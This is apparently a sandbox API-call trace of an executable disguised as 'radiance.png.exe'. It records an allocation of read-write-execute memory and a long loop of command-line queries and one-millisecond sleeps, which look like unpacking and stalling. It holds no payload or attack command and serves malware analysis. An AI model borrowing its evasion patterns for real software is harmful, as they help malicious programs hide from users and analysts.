	[0027.021] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualAlloc") returned 0x76b62fb6
	[0027.021] GetProcAddress (hModule=0x77330000, lpProcName="memcpy") returned 0x77364cc0
	[0027.021] VirtualAlloc (lpAddress=0x0, dwSize=0x2b000, flAllocationType=0x1000, flProtect=0x40) returned 0x1a60000
	[0027.039] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x12ac20 | out: BaseAddress=0x12ac20*=0x76b10000) returned 0x0
	[0027.082] GetStartupInfoW (in: lpStartupInfo=0x1a890ad | out: lpStartupInfo=0x1a890ad*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0027.082] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0027.082] Sleep (dwMilliseconds=0x1) 
	[0027.105] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1a77f8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0027.105] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0027.105] Sleep (dwMilliseconds=0x1) 
	[0027.124] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1984c0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0027.124] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0027.125] Sleep (dwMilliseconds=0x1) 
	[0027.195] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1a1a98*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0027.195] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0027.195] Sleep (dwMilliseconds=0x1) 
	[0027.332] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x196ef8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0027.332] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0027.332] Sleep (dwMilliseconds=0x1) 
	[0027.407] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19a7c8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0027.407] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0027.407] Sleep (dwMilliseconds=0x1) 
	[0027.537] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18efa8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0027.537] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0027.537] Sleep (dwMilliseconds=0x1) 
	[0027.729] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19b508*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0027.729] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0027.729] Sleep (dwMilliseconds=0x1) 
	[0027.810] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19b578*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0027.811] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0027.811] Sleep (dwMilliseconds=0x1) 
	[0027.879] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19b5e8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0027.879] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0027.879] Sleep (dwMilliseconds=0x1) 
	[0027.895] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19b658*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0027.895] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0027.895] Sleep (dwMilliseconds=0x1) 
	[0027.987] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19b6c8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0027.987] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0027.987] Sleep (dwMilliseconds=0x1) 
	[0028.043] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19b738*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.043] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.043] Sleep (dwMilliseconds=0x1) 
	[0028.107] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19b7a8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.107] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.107] Sleep (dwMilliseconds=0x1) 
	[0028.122] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19b818*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.122] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.122] Sleep (dwMilliseconds=0x1) 
	[0028.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19b888*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.144] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.144] Sleep (dwMilliseconds=0x1) 
	[0028.188] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19b8f8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.188] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.188] Sleep (dwMilliseconds=0x1) 
	[0028.286] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19b968*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.286] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.286] Sleep (dwMilliseconds=0x1) 
	[0028.358] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19b9d8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.358] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.358] Sleep (dwMilliseconds=0x1) 
	[0028.393] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19ba48*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.393] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.393] Sleep (dwMilliseconds=0x1) 
	[0028.418] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19bab8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.419] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.419] Sleep (dwMilliseconds=0x1) 
	[0028.453] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19bb28*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.453] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.453] Sleep (dwMilliseconds=0x1) 
	[0028.503] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19bb98*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.503] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.503] Sleep (dwMilliseconds=0x1) 
	[0028.522] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19bc08*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.522] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.522] Sleep (dwMilliseconds=0x1) 
	[0028.545] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19bc78*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.545] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.545] Sleep (dwMilliseconds=0x1) 
	[0028.549] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19bce8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.549] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.549] Sleep (dwMilliseconds=0x1) 
	[0028.565] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19bd58*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.565] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.565] Sleep (dwMilliseconds=0x1) 
	[0028.612] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19bdc8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.612] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.612] Sleep (dwMilliseconds=0x1) 
	[0028.650] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19be38*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.650] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.650] Sleep (dwMilliseconds=0x1) 
	[0028.661] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19bea8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.687] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.691] Sleep (dwMilliseconds=0x1) 
	[0028.971] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19bf18*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.971] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.972] Sleep (dwMilliseconds=0x1) 
	[0028.986] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19bf88*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0028.988] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0028.990] Sleep (dwMilliseconds=0x1) 
	[0029.003] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19bff8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.008] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.012] Sleep (dwMilliseconds=0x1) 
	[0029.022] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19c068*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.022] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.022] Sleep (dwMilliseconds=0x1) 
	[0029.051] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19c0d8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.051] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.051] Sleep (dwMilliseconds=0x1) 
	[0029.067] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19c148*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.067] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.067] Sleep (dwMilliseconds=0x1) 
	[0029.080] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19c1b8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.081] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.081] Sleep (dwMilliseconds=0x1) 
	[0029.095] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19c228*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.096] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.096] Sleep (dwMilliseconds=0x1) 
	[0029.114] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19c298*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.114] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.114] Sleep (dwMilliseconds=0x1) 
	[0029.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19c308*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.134] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.134] Sleep (dwMilliseconds=0x1) 
	[0029.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19c378*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.146] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.146] Sleep (dwMilliseconds=0x1) 
	[0029.188] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19c3e8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.188] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.188] Sleep (dwMilliseconds=0x1) 
	[0029.205] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x19c458*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.205] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.205] Sleep (dwMilliseconds=0x1) 
	[0029.241] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18b9d8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.241] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.241] Sleep (dwMilliseconds=0x1) 
	[0029.253] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18ba48*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.253] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.253] Sleep (dwMilliseconds=0x1) 
	[0029.282] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18bab8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.282] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.282] Sleep (dwMilliseconds=0x1) 
	[0029.317] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18bb28*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.318] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.318] Sleep (dwMilliseconds=0x1) 
	[0029.330] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18bb98*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.330] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.330] Sleep (dwMilliseconds=0x1) 
	[0029.360] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18bc08*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.360] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.360] Sleep (dwMilliseconds=0x1) 
	[0029.394] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18bc78*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.394] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.394] Sleep (dwMilliseconds=0x1) 
	[0029.431] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18bce8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.431] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.431] Sleep (dwMilliseconds=0x1) 
	[0029.438] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18bd58*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.438] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.438] Sleep (dwMilliseconds=0x1) 
	[0029.458] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18bdc8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.458] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.458] Sleep (dwMilliseconds=0x1) 
	[0029.490] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18be38*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0029.490] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0029.490] Sleep (dwMilliseconds=0x1) 
	[0032.013] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18bea8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.013] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.013] Sleep (dwMilliseconds=0x1) 
	[0032.030] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18bf18*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.030] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.030] Sleep (dwMilliseconds=0x1) 
	[0032.045] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18bf88*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.045] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.045] Sleep (dwMilliseconds=0x1) 
	[0032.059] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18bff8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.059] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.059] Sleep (dwMilliseconds=0x1) 
	[0032.075] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c068*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.075] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.075] Sleep (dwMilliseconds=0x1) 
	[0032.102] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c0d8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.102] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.102] Sleep (dwMilliseconds=0x1) 
	[0032.107] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c148*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.107] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.107] Sleep (dwMilliseconds=0x1) 
	[0032.123] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c1b8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.123] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.124] Sleep (dwMilliseconds=0x1) 
	[0032.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c228*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
